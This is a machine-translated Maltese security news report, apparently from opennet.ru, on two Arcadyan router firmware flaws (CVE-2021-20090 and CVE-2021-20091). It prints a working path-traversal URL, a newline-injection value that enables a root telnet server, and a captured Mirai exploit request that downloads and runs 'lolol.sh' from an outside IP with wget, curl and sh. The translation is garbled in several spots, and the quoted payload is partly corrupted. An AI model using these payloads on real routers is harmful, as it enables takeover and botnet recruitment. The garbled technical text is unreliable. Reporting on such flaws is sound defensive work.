Ġie rreġistrat attakk massiv fuq in-netwerk kontra r-routers tad-dar li l-firmware tagħhom juża implimentazzjoni ta 'server HTTP mill-kumpanija Arcadyan. Biex tikseb kontroll fuq l-apparati, tintuża taħlita ta 'żewġ vulnerabbiltajiet li tippermetti l-eżekuzzjoni remota ta' kodiċi arbitrarju bi drittijiet ta 'l-għeruq. Il-problema taffettwa firxa pjuttost wiesgħa ta’ routers ADSL minn Arcadyan, ASUS u Buffalo, kif ukoll apparati fornuti taħt il-marki Beeline (il-problema hija kkonfermata fi Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone u operaturi tat-telekomunikazzjoni oħra. Huwa nnutat li l-problema ilha preżenti fil-firmware Arcadyan għal aktar minn 10 snin u matul dan iż-żmien irnexxielha temigra għal mill-inqas 20 mudelli ta 'apparat minn 17-il fabbrikant differenti.
L-ewwel vulnerabbiltà, CVE-2021-20090, tagħmilha possibbli li wieħed jaċċessa kwalunkwe skript tal-interface tal-web mingħajr awtentikazzjoni. L-essenza tal-vulnerabbiltà hija li fl-interface tal-web, xi direttorji li permezz tagħhom jintbagħtu immaġini, fajls CSS u skripts JavaScript huma aċċessibbli mingħajr awtentikazzjoni. F'dan il-każ, direttorji li għalihom huwa permess l-aċċess mingħajr awtentikazzjoni huma kkontrollati bl-użu tal-maskra inizjali. L-ispeċifikazzjoni ta' karattri “../” fil-mogħdijiet biex imorru fid-direttorju ġenitur hija mblukkata mill-firmware, iżda l-użu tal-kombinazzjoni “..%2f” tinqabeż. Għalhekk, huwa possibbli li tiftaħ paġni protetti meta tibgħat talbiet bħal "http://192.168.1.1/images/..%2findex.htm".
It-tieni vulnerabbiltà, CVE-2021-20091, tippermetti utent awtentikat li jagħmel bidliet fis-settings tas-sistema tal-apparat billi jibgħat parametri ifformattjati apposta lill-iskrittura apply_abstract.cgi, li ma jiċċekkjax il-preżenza ta' karattru newline fil-parametri. . Pereżempju, meta jwettaq operazzjoni ta' ping, attakkant jista' jispeċifika l-valur "192.168.1.2%0AARC_SYS_TelnetdEnable=1" fil-qasam bl-indirizz IP li jkun qed jiġi ċċekkjat, u l-iskript, meta joħloq il-fajl tas-settings /tmp/etc/config/ .glbcfg, se tikteb il-linja "AARC_SYS_TelnetdEnable=1" fiha ", li jattiva s-server telnetd, li jipprovdi aċċess bla restrizzjonijiet għall-qoxra tal-kmand bi drittijiet tal-għeruq. Bl-istess mod, billi tistabbilixxi l-parametru AARC_SYS, tista 'tesegwixxi kwalunkwe kodiċi fis-sistema. L-ewwel vulnerabbiltà tagħmilha possibbli li titħaddem skript problematiku mingħajr awtentikazzjoni billi taċċessah bħala “/images/..%2fapply_abstract.cgi”.
Biex tisfrutta l-vulnerabbiltajiet, attakkant irid ikun kapaċi jibgħat talba lill-port tan-netwerk li fuqu tkun qed taħdem l-interface tal-web. Ġġudikati mid-dinamika tat-tixrid tal-attakk, ħafna operaturi jħallu aċċess fuq it-tagħmir tagħhom min-netwerk estern biex jissimplifikaw id-dijanjosi tal-problemi mis-servizz ta 'appoġġ. Jekk l-aċċess għall-interface huwa limitat biss għan-netwerk intern, jista 'jitwettaq attakk minn netwerk estern bl-użu tat-teknika "DNS rebinding". Il-vulnerabbiltajiet diġà qed jintużaw b'mod attiv biex jgħaqqdu r-routers mal-botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Konnessjoni: qrib User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Sors: opennet.ru